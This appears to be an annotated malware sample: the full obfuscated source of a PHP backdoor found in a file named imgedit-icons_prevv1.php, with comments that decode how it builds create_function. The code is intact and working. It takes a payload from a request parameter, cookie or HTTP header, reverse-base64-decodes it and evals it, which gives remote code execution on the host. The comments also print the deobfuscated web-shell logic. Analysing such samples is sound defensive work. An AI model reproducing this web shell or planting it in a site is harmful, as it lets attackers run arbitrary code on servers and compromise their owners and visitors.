HTTP_SDCHIMBR virus imgedit-icons_prevv1.php

1. <?php
2. /**
3. *
4. * The virus was inside a file name imgedit-icons_prevv1.php
5. * Uploaded by unknown way.
6. * It is probably some kind of a bot due to the HTTP based commands.
7. * It have infected functions.php with the following -
8. * http://pastebin.com/npmhVNiN
9. *
10. * Translated by Yehonatan Tsirolnik
11. *
12. **/
13. // Virus dictionary
14. $caresser = 't';
15. $cavernous = 't';
16. $bomb = 'r';
17. $denouement = '_';
18. $atatwalker = 'Vl$O';
19. $fading = '_';
20. $cleat = 't"';
21. $interferes = ';';
22. $hoops = 'S';
23. $longer = 'Q';
24. $arthropods = '"())lm';
25. $blustering = '[';
26. $formalizing = 'rs';
27. $diary = 't';
28. $hurty = 'ag:)aa';
29. $bartholemy = 's';
30. $all = 'X';
31. $lasttango = 'a';
32. $archambault = 'Ir';
33. $animal = 'Z';
34. $arson = 'e($s';
35. $fruitfulness = '$';
36. $disposals = ')';
37. $jamesy = 'm';
38. $hieratic = '_';
39. $coordinators = 'a"r_;re';
40. $christoper = '$e bTpO';
41. $evict = '4iBR';
42. $anatomically = 'r';
43. $darcy = '(';
44. $lake = ';';
45. $densest = 'v_';
46. $far = '(';
47. $indebted = 'R';
48. $majesty = '"';
49. $infest = '](ec';
50. $cogent = 'YIe)ne';
51. $creative = ']';
52. $intimated = 'P';
53. $fluffier = 'eH[sg$eB';
54. $contemplates = '$u(';
55. $disobeyed = '_[siou';
56. $botanist = 'R';
57. $carline = ')';
58. $antenna = 'd';
59. $aryn = 'R[Cr';
60. $attributes = 'd';
61. $alwyn = '(HTRiivi';
62. $authenticity = 'b]Ur_S';
63. $fiducial = 'sEc,Tf6';
64. $lanna = 'bW';
65. $ericka = 'I';
66. $disowned = 'L';
67. $hut = 'rcI"';
68. $equipotent = ']';
69. $blane = 'cv$eeT_U';
70. $keenness = 'D';
71. $fuselage = 'V"iTrvE$';
72. $checkable = '_d^r';
73. $examination = 'at$n"s';
74. $looted = 'Ea(r?tf';
75. $cool = '?"';
76. $clam = 'ah)eJdd';
77. $beribboned = 'm';
78. $ashley = 'i';
79. $directing = 'e';
80. $falter = ')';
81. $breadbox = 'Trag,';
82. $initiator = '(';
83. $brakeman = 'QE';
84. $forth = 'i';
85. $coneflower = 'e';
86. $chow = 'h=HOns';
87. $ciliate = 'yc';
88. $fascist = 'io_D_Ms';
89. $evidential = 'i';
90. $depositor = ']';
91. $franzen = '(';
92. $maje = '(';
93. $hydrochloric = 'M';
94. $dispersive = 'SC';
95. $devout = ':';
96. $gourmet = 'Kce;ia=C[';
97. $conferences = 'PtNHM$';
98. $justifying = 'P';
99. $escape = 'p';
100. $delegating = ')';
101. $engineer = ')';
102. $legume = 'EsS)';
103. $banjo = 'yK';
104. $imagine = 'R';
105. $cleanliness = 'S';
106. $evita = '_eao';
107.  
108. // End of dictionary
109.  
110. // The line below translates to create_function
111. $chilliness = $gourmet['1'] . $breadbox['1'] . $evita[1] . $evita['2'] . $conferences['1'] . $evita[1] . $evita['0'] . $looted[6] . $disobeyed['5'] . $chow[4] . $gourmet['1'] . $conferences['1'] . $gourmet['4'] . $evita['3'] . $chow[4];
112.  
113. // Space - 0x20
114. $litmus = $christoper['2'];
115.  
116. //The line below does -
117. //$andria = create_function(" ", "eval(array_pop(func_get_args()));")
118.  
119. $andria = $chilliness($litmus, $evita[1] . $fuselage['5'] . $evita['2'] . $arthropods['4'] . $maje . $evita['2'] . $breadbox['1'] . $breadbox['1'] . $evita['2'] . $banjo['0'] . $evita['0'] . $escape . $evita['3'] . $escape . $maje . $looted[6] . $disobeyed['5'] . $chow[4] . $gourmet['1'] . $evita['0'] . $breadbox['3'] . $evita[1] . $conferences['1'] . $evita['0'] . $evita['2'] . $breadbox['1'] . $breadbox['3'] . $legume[1] . $maje . $legume['3'] . $legume['3'] . $legume['3'] . $gourmet['3']);
120.  
121. // Call the lambada function
122. // Arguments that are being passed to the function are:
123. //  E,Z,h,i,Z,[,I,],b,X,l,"$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["sdchimbr"])?$i["sdchimbr"]:(isset($i["HTTP_SDCHIMBR"])?$i["HTTP_SDCHIMBR"]:die);eval(strrev(base64_decode(strrev($a))));"
124. //  But, techincally due to the array_pop it only evals the php code written above in the brackets
125. //  The formatted php is -
126. /*
127. $i = array_merge($_REQUEST, $_COOKIE, $_SERVER);
128. $a = isset($i["sdchimbr"]) ? $i["sdchimbr"] : (isset($i["HTTP_SDCHIMBR"]) ? $i["HTTP_SDCHIMBR"] : die);
129. eval(strrev(base64_decode(strrev($a))));
130. */
131. //  Which translates to the nicer one -
132. /*
133. $i = array_merge($_REQUEST, $_COOKIE, $_SERVER);
134.  
135. if (isset($i["sdchimbr"])) {
136.     $a = $i["sdchimbr"];
137. }
138. else {
139.     if (isset($i["HTTP_SDCHIMBR"])) {
140.         $a = $i["HTTP_SDCHIMBR"];
141.     }
142.     else {
143.         die
144.     };
145. }
146.  
147. eval(strrev(base64_decode(strrev($a))));
148. *
149. * So the function below executes the code above
150. *
151. */
152. $andria($legume[0], $animal, $chow['0'], $gourmet['4'], $animal, $gourmet['8'], $hut['2'], $depositor, $lanna['0'], $all, $arthropods['4'], $conferences[5] . $gourmet['4'] . $gourmet['6'] . $evita['2'] . $breadbox['1'] . $breadbox['1'] . $evita['2'] . $banjo['0'] . $evita['0'] . $beribboned . $evita[1] . $breadbox['1'] . $breadbox['3'] . $evita[1] . $maje . $conferences[5] . $evita['0'] . $imagine . $legume[0] . $brakeman['0'] . $blane[7] . $legume[0] . $cleanliness . $breadbox['0'] . $breadbox['4'] . $conferences[5] . $evita['0'] . $gourmet['7'] . $chow['3'] . $chow['3'] . $banjo['1'] . $hut['2'] . $legume[0] . $breadbox['4'] . $conferences[5] . $evita['0'] . $cleanliness . $legume[0] . $imagine . $fuselage[0] . $legume[0] . $imagine . $legume['3'] . $gourmet['3'] . $conferences[5] . $evita['2'] . $gourmet['6'] . $gourmet['4'] . $legume[1] . $legume[1] . $evita[1] . $conferences['1'] . $maje . $conferences[5] . $gourmet['4'] . $gourmet['8'] . $cool['1'] . $legume[1] . $clam['6'] . $gourmet['1'] . $chow['0'] . $gourmet['4'] . $beribboned . $lanna['0'] . $breadbox['1'] . $cool['1'] . $depositor . $legume['3'] . $cool['0'] . $conferences[5] . $gourmet['4'] . $gourmet['8'] . $cool['1'] . $legume[1] . $clam['6'] . $gourmet['1'] . $chow['0'] . $gourmet['4'] . $beribboned . $lanna['0'] . $breadbox['1'] . $cool['1'] . $depositor . $devout . $maje . $gourmet['4'] . $legume[1] . $legume[1] . $evita[1] . $conferences['1'] . $maje . $conferences[5] . $gourmet['4'] . $gourmet['8'] . $cool['1'] . $conferences[3] . $breadbox['0'] . $breadbox['0'] . $justifying . $evita['0'] . $cleanliness . $fascist[3] . $gourmet['7'] . $conferences[3] . $hut['2'] . $conferences['4'] . $fluffier['7'] . $imagine . $cool['1'] . $depositor . $legume['3'] . $cool['0'] . $conferences[5] . $gourmet['4'] . $gourmet['8'] . $cool['1'] . $conferences[3] . $breadbox['0'] . $breadbox['0'] . $justifying . $evita['0'] . $cleanliness . $fascist[3] . $gourmet['7'] . $conferences[3] . $hut['2'] . $conferences['4'] . $fluffier['7'] . $imagine . $cool['1'] . $depositor . $devout . $clam['6'] . $gourmet['4'] . $evita[1] . $legume['3'] . $gourmet['3'] . $evita[1] . $fuselage['5'] . $evita['2'] . $arthropods['4'] . $maje . $legume[1] . $conferences['1'] . $breadbox['1'] . $breadbox['1'] . $evita[1] . $fuselage['5'] . $maje . $lanna['0'] . $evita['2'] . $legume[1] . $evita[1] . $fiducial['6'] . $evict[0] . $evita['0'] . $clam['6'] . $evita[1] . $gourmet['1'] . $evita['3'] . $clam['6'] . $evita[1] . $maje . $legume[1] . $conferences['1'] . $breadbox['1'] . $breadbox['1'] . $evita[1] . $fuselage['5'] . $maje . $conferences[5] . $evita['2'] . $legume['3'] . $legume['3'] . $legume['3'] . $legume['3'] . $gourmet['3']);